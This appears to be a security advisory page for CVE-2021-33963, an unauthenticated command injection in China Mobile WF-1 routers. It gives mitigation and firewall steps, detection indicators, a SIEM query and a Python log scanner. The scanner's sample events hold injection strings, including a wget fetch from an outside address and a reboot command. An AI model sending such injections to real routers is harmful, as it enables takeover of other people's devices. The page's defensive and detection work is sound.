CVE-2021-33963

9.8 CRITICAL

📋 TL;DR

CVE-2021-33963 is a command injection vulnerability in China Mobile An Lianbao WF-1 routers that allows remote attackers to execute arbitrary commands on affected devices. The vulnerability exists in the web interface's /api/ZRMacClone/mac_addr_clone endpoint where the macType parameter is not properly sanitized. This affects users of China Mobile An Lianbao WF-1 routers with vulnerable firmware.

💻 Affected Systems

Products:
  • China Mobile An Lianbao WF-1 router
Versions: v1.0.1 (the version named in the CVE record); earlier firmware builds are unconfirmed but likely share the same code
Operating Systems: Embedded Linux firmware
Default Config Vulnerable: ⚠️ Yes
Notes: Affects the web management interface which is typically enabled by default. The vulnerability is in the specific API endpoint handling MAC address cloning.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴 Worst Case

Complete compromise of the router, allowing the attacker to intercept all network traffic, install persistent backdoors, pivot to internal network devices, and potentially brick the device.

🟠 Likely Case

The attacker gains remote shell access to the router, can modify DNS settings, intercept credentials, and use the router as a pivot point for further attacks.

🟢 If Mitigated

With proper network segmentation and firewall rules, impact is limited to compromise of the router itself without lateral movement to other systems. Note that the router still sits in the path of its clients' traffic, so DNS manipulation and interception of unencrypted traffic remain possible until the device is patched.

🌐 Internet-Facing: HIGH - If remote (WAN-side) management is enabled, the endpoint can be hit directly from anywhere; ISP-supplied routers are frequently shipped that way.
🏢 Internal Only: MEDIUM - If the web interface is reachable only from the LAN, any compromised LAN host can still reach it, and because no authentication is required a browser on the LAN may be coerced by a malicious web page into sending the POST on the attacker's behalf.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation requires sending a crafted POST request to the vulnerable endpoint. No authentication is required, making this trivial to exploit.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: http://iot.10086.cn/?l=en-us

Restart Required: Yes

Instructions:

1. Check the vendor website for firmware updates.
2. Download the latest firmware.
3. Access the router admin interface.
4. Navigate to the firmware update section.
5. Upload and apply the new firmware.
6. Reboot the router.

🔧 Temporary Workarounds

Disable remote (WAN-side) web management

Disable the router's web management interface, or at minimum its remote-management (WAN-side) exposure, so the vulnerable endpoint is not reachable from the internet. Whether the web service can be stopped entirely depends on the firmware: if the device offers a CLI over SSH/Telnet, stop the web service there; otherwise use the remote-management setting in the admin UI. The endpoint remains reachable from the LAN (and therefore from any compromised LAN host) until the firmware is fixed.

Block access to vulnerable endpoint

Use a firewall rule to drop HTTP requests that carry the vulnerable path, either on the router itself (if its kernel ships the xt_string match and lets you add rules) or on an upstream gateway that sees the plaintext traffic. The rule is inserted at the top of the chain so it is evaluated before any existing ACCEPT for port 80:

iptables -I INPUT 1 -p tcp --dport 80 -m string --string "/api/ZRMacClone/mac_addr_clone" --algo bm -j DROP

Caveats: the string match inspects individual packets, so a request split across TCP segments or sent with the path encoded differently will slip past it; it cannot inspect TLS traffic on port 443; and the rule is lost on reboot unless persisted. Treat it as a stopgap, not a fix.

🧯 If You Can't Patch

  • Place the router's management interface on a dedicated management VLAN reachable only from administrative hosts, to limit lateral movement from a compromised device
  • Implement strict firewall rules blocking all inbound access to router management interface

🔍 How to Verify

Check if Vulnerable:

Send a POST request to http://[router-ip]/api/ZRMacClone/mac_addr_clone with a macType value that contains a command-injection payload and check whether the command executes. Only test devices you own or are authorised to assess, and prefer a non-destructive payload (one whose only effect is a measurable delay or a harmless observable side effect) over anything that changes configuration. The body format the endpoint expects (form-encoded or JSON) is not documented here; capture the admin UI's own MAC-clone request in the browser's developer tools to see the real parameter encoding before probing.

Check Version:

Check the firmware version shown on the router's admin status/system page, or, if the device exposes a shell over SSH/Telnet, read the firmware's version file (commonly /etc/version, though the path varies by firmware).

Verify Fix Applied:

Attempt exploitation after applying firmware update or workarounds to confirm vulnerability is no longer exploitable.

📡 Detection & Monitoring

Log Indicators:

  • POST requests to /api/ZRMacClone/mac_addr_clone from unexpected sources, in particular from the WAN side, or outside normal administration activity
  • macType values containing shell metacharacters (; | & ` $ newline), including their URL-encoded forms (%3B %7C %26 %60 %24 %0A)
  • Unexpected child processes spawned by the web server process (shell interpreters, wget/curl), where the device offers any process visibility

Network Indicators:

  • POST requests to router IP on port 80/443 with command injection patterns in payload
  • Outbound connections from router to suspicious IPs

SIEM Query:

source="router_logs" AND uri_path="/api/ZRMacClone/mac_addr_clone" AND (request_body CONTAINS "|" OR request_body CONTAINS ";" OR request_body CONTAINS "`" OR request_body CONTAINS "$" OR request_body CONTAINS "%7C" OR request_body CONTAINS "%3B" OR request_body CONTAINS "%60" OR request_body CONTAINS "%24" OR request_body CONTAINS "%0A")

This is a literal substring match, so it is only as good as the body it sees: if your log pipeline does not URL-decode request bodies, the encoded variants above are needed; if it does, the plain characters suffice. "&" is omitted from the match because it separates fields in a form-encoded body and would fire on every multi-parameter request; to catch it reliably, decode the body and inspect only the macType value.
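The detection logic above, run over a few constructed log events, as an added example that is not part of the original page or of any vendor tooling. It assumes the log events carry uri_path and request_body fields as in the SIEM query, and that the body is either form-encoded or JSON (an assumption: the endpoint's real request format is not documented here). Unlike a literal substring match it percent-decodes the value (repeatedly, to defeat double encoding) and inspects only the macType parameter, so an "&" separating form fields does not fire while an "&" inside the value does.

```python
import json
from urllib.parse import unquote_plus

VULN_PATH = "/api/ZRMacClone/mac_addr_clone"
# Characters that let a value break out of a shell command line.
SHELL_META = set(";|&`$\n\r(){}<>")

# Constructed sample events (not real router logs), using the same field
# names as the SIEM query: uri_path and request_body.
SAMPLE_EVENTS = [
    {"src": "192.168.1.20", "method": "POST", "uri_path": VULN_PATH,
     "request_body": "macType=pc"},                                        # benign clone request
    {"src": "203.0.113.7", "method": "POST", "uri_path": VULN_PATH,
     "request_body": "macType=pc;id"},                                     # plain metacharacter
    {"src": "203.0.113.7", "method": "POST", "uri_path": VULN_PATH,
     "request_body": "macType=pc%7Cwget%20http%3A%2F%2F203.0.113.7%2Fx"},  # URL-encoded pipe
    {"src": "198.51.100.3", "method": "POST", "uri_path": VULN_PATH,
     "request_body": '{"macType": "pc\\nreboot"}'},                        # JSON body (assumed format), newline
    {"src": "192.168.1.21", "method": "POST", "uri_path": "/api/login",
     "request_body": "user=a%3Bb&password=x"},                             # other endpoint: ignored
]


def decode_value(value, max_rounds=3):
    """Percent-decode repeatedly (bounded) so double-encoded payloads normalise."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def mac_type_values(body):
    """Return every macType value in a form-encoded or JSON body (assumed formats)."""
    body = body.strip()
    if body.startswith("{"):
        try:
            data = json.loads(body)
        except ValueError:
            return []
        if not isinstance(data, dict) or data.get("macType") is None:
            return []
        return [decode_value(str(data["macType"]))]
    # Split on the raw '&' first: an '&' that only appears after decoding is
    # then a metacharacter inside a value, not a field separator.
    values = []
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        if unquote_plus(key) == "macType":
            values.append(decode_value(value))
    return values


def inspect_event(event):
    """Return a finding for a POST to the vulnerable path whose macType value
    carries shell metacharacters, else None."""
    if event.get("method") != "POST" or event.get("uri_path") != VULN_PATH:
        return None
    for value in mac_type_values(event.get("request_body", "")):
        meta = sorted(c for c in set(value) if c in SHELL_META)
        if meta:
            return {"src": event.get("src"), "macType": value, "metacharacters": meta}
    return None


def scan(events):
    """Run inspect_event over a batch and keep only the findings."""
    return [f for f in map(inspect_event, events) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Run against the constructed events it flags the three injection attempts and ignores both the benign clone request and the unrelated endpoint; feed it your own exported events in the same shape to tune the metacharacter set or add the source-address checks your environment needs.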

🔗 References
